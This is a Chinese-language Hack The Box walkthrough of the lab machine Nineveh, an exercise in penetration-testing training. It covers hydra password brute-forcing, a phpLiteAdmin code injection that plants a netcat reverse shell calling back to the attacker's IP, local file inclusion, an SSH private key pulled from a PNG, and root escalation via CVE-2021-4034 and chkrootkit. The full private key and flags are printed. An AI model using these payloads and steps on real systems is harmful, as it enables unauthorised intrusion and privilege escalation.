Nineveh-htb-writeup

0x00 靶场技能介绍

章节技能:目录枚举、口令爆破、hydra、phpLiteAdmin代码注入、任意文件包含、png包含SSH秘钥、binwalk、CVE-2021-4034、Chrookit 漏洞

参考链接:https://yufongg.github.io/posts/Nineveh/

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.43

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=5000  10.10.10.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 22:22 CST
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (1.1s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 32.39 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,443 -sC -sV --min-rate=5000  10.10.10.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 22:28 CST
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (1.1s latency).

PORT    STATE SERVICE   VERSION
80/tcp  open  http      Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/https Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.73 seconds

3、本地绑定与发现的域名地址

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.43 nineveh.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.43 nineveh.htb

4、简单看一下开放的WEB网站信息

http://10.10.10.43/

https://nineveh.htb/

https://nineveh.htb/db/

1
Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114

http://nineveh.htb/department/login.php

5、通过对两个登录的爆破,成功发现两个网站的账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿offsec)-[~/Desktop]
└─$ hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 22:27:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 399 login tries (l:1/p:399), ~25 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 359 to do in 00:09h, 16 active
[STATUS] 41.67 tries/min, 125 tries in 00:03h, 274 to do in 00:07h, 16 active
[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
[STATUS] 57.00 tries/min, 399 tries in 00:07h, 1 to do in 00:01h, 5 active

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hydra nineveh.htb -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" 
[sudo] kali 的密码:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 22:32:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://nineveh.htb:80/department/login.php:username=^USER^&password=^PASS^:Invalid Password
[STATUS] 197.00 tries/min, 197 tries in 00:01h, 14344202 to do in 1213:34h, 16 active
[STATUS] 213.67 tries/min, 641 tries in 00:03h, 14343758 to do in 1118:52h, 16 active
[STATUS] 186.14 tries/min, 1303 tries in 00:07h, 14343096 to do in 1284:15h, 16 active
[STATUS] 161.47 tries/min, 2422 tries in 00:15h, 14341977 to do in 1480:24h, 16 active
[80][http-post-form] host: nineveh.htb   login: admin   password: 1q2w3e4r5t

https://nineveh.htb/db/

1
password123

http://nineveh.htb/department/login.php

1
admin:1q2w3e4r5t

6、经过简单的尝试,发现这里存在任意文件包含漏洞

http://nineveh.htb/department/manage.php

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt

http://nineveh.htb/department/manage.php?notes=../files/ninevehNotes.txt

7、同时在另一个db目录的后台地址那,发现了PHP代码注入漏洞

https://nineveh.htb/db/index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit phpLiteAdmin     
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                        |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
phpLiteAdmin - 'table' SQL Injection                                                                                                                  | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                                                                                                           | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                                                                                                        | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                                                                                                         | php/webapps/39714.txt
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 24044    
  Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
      URL: https://www.exploit-db.com/exploits/24044
     Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
    Codes: OSVDB-89126
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/24044.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 24044.txt 
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL

8、按照提示进行创建利用

https://nineveh.htb/db/index.php

https://nineveh.htb/db/index.php?switchdb=%2Fvar%2Ftmp%2Frce.php

https://nineveh.htb/db/index.php?action=table_create

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 443 >/tmp/f");?>

9、这里结合上一个网站的任意文件读取包含,可以获取到一个初始的shell环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../var/tmp/rce.php

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.43] 53294
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$ 

www-data@nineveh:/var/www/html/department$

10、成功获取到反弹shell,升级一下完整的交互shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
www-data@nineveh:/var/www/html/department$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www-data@nineveh:/var/www/html/department$ ^Z
zsh: suspended  nc -lvnp 443
                                                              
┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443
                              reset
reset: unknown terminal type unknown
Terminal type? screen


www-data@nineveh:/var/www/html/department$


www-data@nineveh:/var/www/html/department$ ls -la /home
total 12
drwxr-xr-x  3 root   root   4096 Jul  2  2017 .
drwxr-xr-x 24 root   root   4096 Jan 29  2021 ..
drwxr-xr-x  4 amrois amrois 4096 Dec 17  2020 amrois
www-data@nineveh:/var/www/html/department$

11、经过各种枚举,发现 nineveh.png 图片中包含ssh的秘钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
www-data@nineveh:/var/www/html/department$ cd /home/amrois
www-data@nineveh:/home/amrois$ ls -la
total 32
drwxr-xr-x 4 amrois amrois 4096 Dec 17  2020 .
drwxr-xr-x 3 root   root   4096 Jul  2  2017 ..
lrwxrwxrwx 1 root   root      9 Dec 17  2020 .bash_history -> /dev/null
-rw-r--r-- 1 amrois amrois  220 Jul  2  2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul  2  2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul  3  2017 .cache
-rw-r--r-- 1 amrois amrois  655 Jul  2  2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul  2  2017 .ssh
-rw------- 1 amrois amrois   33 May 26 10:48 user.txt
www-data@nineveh:/home/amrois$



www-data@nineveh:/home/amrois$ cd /var/www/                
www-data@nineveh:/var/www$ ls -la
total 20
drwxr-xr-x  5 root root 4096 Jul  2  2017 .
drwxr-xr-x 14 root root 4096 Jul  2  2017 ..
drwxr-xr-x  2 root root 4096 Jul  2  2017 cd
drwxr-xr-x  3 root root 4096 Jul  2  2017 html
drwxr-xr-x  4 root root 4096 Jul  2  2017 ssl
www-data@nineveh:/var/www$ cd ssl
www-data@nineveh:/var/www/ssl$ ls -la
total 568
drwxr-xr-x 4 root root   4096 Jul  2  2017 .
drwxr-xr-x 5 root root   4096 Jul  2  2017 ..
drwxr-xr-x 2 root root   4096 Jul  2  2017 db
-rw-r--r-- 1 root root     49 Jul  2  2017 index.html
-rw-r--r-- 1 root root 560852 Jul  2  2017 ninevehForAll.png
drwxr-xr-x 2 root root   4096 Jul  2  2017 secure_notes
www-data@nineveh:/var/www/ssl$ cd secure_notes/
www-data@nineveh:/var/www/ssl/secure_notes$ ls -la
total 2840
drwxr-xr-x 2 root root    4096 Jul  2  2017 .
drwxr-xr-x 4 root root    4096 Jul  2  2017 ..
-rw-r--r-- 1 root root      71 Jul  2  2017 index.html
-rw-r--r-- 1 root root 2891984 Jul  2  2017 nineveh.png
www-data@nineveh:/var/www/ssl/secure_notes$


www-data@nineveh:/var/www/ssl/secure_notes$ strings -n 20 nineveh.png
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
www-data@nineveh:/var/www/ssl/secure_notes$

12、这里就发现了另一个用户的ssh key了,这里补充下上面发现的步骤,先把文件传输到本地地址上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
──(kali㉿offsec)-[~/Desktop]
└─$ nc -lnp 6666 > nineveh.png


www-data@nineveh:/var/www/ssl/secure_notes$ 
<sl/secure_notes$ nc -v 10.10.14.45 6666 < nineveh.png                       
Connection to 10.10.14.45 6666 port [tcp/*] succeeded!
www-data@nineveh:/var/www/ssl/secure_notes$ 
www-data@nineveh:/var/www/ssl/secure_notes$ 


┌──(kali㉿offsec)-[~/Desktop]
└─$ binwalk nineveh.png                                                                                                          

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo binwalk -eM --run-as=root nineveh.png 
[sudo] kali 的密码:

Scan Time:     2024-05-27 23:32:43
Target File:   /home/kali/Desktop/nineveh.png
MD5 Checksum:  353b8f5a4578e4472c686b6e1f15c808
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)


Scan Time:     2024-05-27 23:32:43
Target File:   /home/kali/Desktop/_nineveh.png.extracted/54
MD5 Checksum:  d41d8cd98f00b204e9800998ecf8427e
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------


Scan Time:     2024-05-27 23:32:43
Target File:   /home/kali/Desktop/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum:  f426d661f94b16292efc810ebb7ea305
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PEM RSA private key


Scan Time:     2024-05-27 23:32:43
Target File:   /home/kali/Desktop/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum:  6b60618d207ad97e76664174e805cfda
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             OpenSSH RSA public key

13、由于靶机没有SSH端口,所以只能在获取的初始shell中进行用户切换了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
www-data@nineveh:/var/www/ssl/secure_notes$ cd /tmp
www-data@nineveh:/tmp$ wget 10.10.14.45/nineveh.priv
--2024-05-27 02:43:46--  http://10.10.14.45/nineveh.priv
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K) [application/octet-stream]
Saving to: 'nineveh.priv'

nineveh.priv        100%[===================>]   1.64K  --.-KB/s    in 0.03s   

2024-05-27 02:43:47 (64.3 KB/s) - 'nineveh.priv' saved [1675/1675]

www-data@nineveh:/tmp$ ls -la
total 40
drwxrwxrwt  9 root     root     4096 May 27 02:43 .
drwxr-xr-x 24 root     root     4096 Jan 29  2021 ..
drwxrwxrwt  2 root     root     4096 May 26 10:48 .ICE-unix
drwxrwxrwt  2 root     root     4096 May 26 10:48 .Test-unix
drwxrwxrwt  2 root     root     4096 May 26 10:48 .X11-unix
drwxrwxrwt  2 root     root     4096 May 26 10:48 .XIM-unix
drwxrwxrwt  2 root     root     4096 May 26 10:48 .font-unix
prw-r--r--  1 www-data www-data    0 May 27 02:43 f
-rw-r--r--  1 www-data www-data 1675 May 27  2024 nineveh.priv
drwx------  3 root     root     4096 May 26 10:48 systemd-private-ad3cdfb60db0415996f4eb34b1ec1207-systemd-timesyncd.service-RpSvjR
drwx------  2 root     root     4096 May 26 10:48 vmware-root
www-data@nineveh:/tmp$ chmod 600 ./nineveh.priv
www-data@nineveh:/tmp$ ssh amrois@localhost -i nineveh.priv
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ id
uid=1000(amrois) gid=1000(amrois) groups=1000(amrois)
amrois@nineveh:~$ pwd
/home/amrois
amrois@nineveh:~$

14、至此获取到第一个flag信息

1
2
3
amrois@nineveh:~$ cat user.txt 
721fd8afb8ea1480e4db0fa713754877
amrois@nineveh:~$

0x02 系统权限获取

15、这里使用linpeas工具进行枚举,发现了两个可以提权的漏洞

16、这里先利用第一个漏洞进行提权,并获取最终的flag信息

CVE-2021-4034

https://github.com/joeammond/CVE-2021-4034

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
amrois@nineveh:~$ wget 10.10.14.45/CVE-2021-4034.py
--2024-05-27 02:50:18--  http://10.10.14.45/CVE-2021-4034.py
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.03s   

2024-05-27 02:50:24 (105 KB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]

amrois@nineveh:~$ ls -la
total 36
drwxr-xr-x 4 amrois amrois 4096 May 27 02:50 .
drwxr-xr-x 3 root   root   4096 Jul  2  2017 ..
lrwxrwxrwx 1 root   root      9 Dec 17  2020 .bash_history -> /dev/null
-rw-r--r-- 1 amrois amrois  220 Jul  2  2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul  2  2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul  3  2017 .cache
-rw-rw-r-- 1 amrois amrois 3262 May 27  2024 CVE-2021-4034.py
-rw-r--r-- 1 amrois amrois  655 Jul  2  2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul  2  2017 .ssh
-rw------- 1 amrois amrois   33 May 26 10:48 user.txt
amrois@nineveh:~$ chmod +x CVE-2021-4034.py
amrois@nineveh:~$ python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(amrois) groups=1000(amrois)
# cat /root/root.txt
a0bf015e98ee7483a9a841a9cd16fc9c
#

17、另一个权限提升:Root——Chrookit 漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit chkrootkit       
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                        |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                                                                                                  | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                                                                                          | linux/local/33899.txt
------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results



创建脚本来设置 SUID 位/bin/bash

 amrois@nineveh:~$ nano /tmp/update
		
 cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash

 amrois@nineveh:~$ chmod +x /tmp/update



amrois@nineveh:~$ 
amrois@nineveh:~$ echo "/bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash" >  /tmp/update 
amrois@nineveh:~$ 
amrois@nineveh:~$ chmod +x /tmp/update
amrois@nineveh:~$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash
amrois@nineveh:~$ 


amrois@nineveh:~$ cat /tmp/update
cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash
amrois@nineveh:~$ ls -la /tmp/rootbash
-rwsr-xr-x 1 root root 1037528 May 27 02:59 /tmp/rootbash
amrois@nineveh:~$ /tmp/rootbash -p
rootbash-4.3# id
uid=1000(amrois) gid=1000(amrois) euid=0(root) groups=1000(amrois)
rootbash-4.3# cat /root/root.txt
a0bf015e98ee7483a9a841a9cd16fc9c
rootbash-4.3#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/54

打靶记
#shooting-range
Nineveh-htb-writeup
https://sh1yan.top/2024/05/27/Nineveh-htb-writeup/
作者
shiyan
发布于
2024年5月27日
许可协议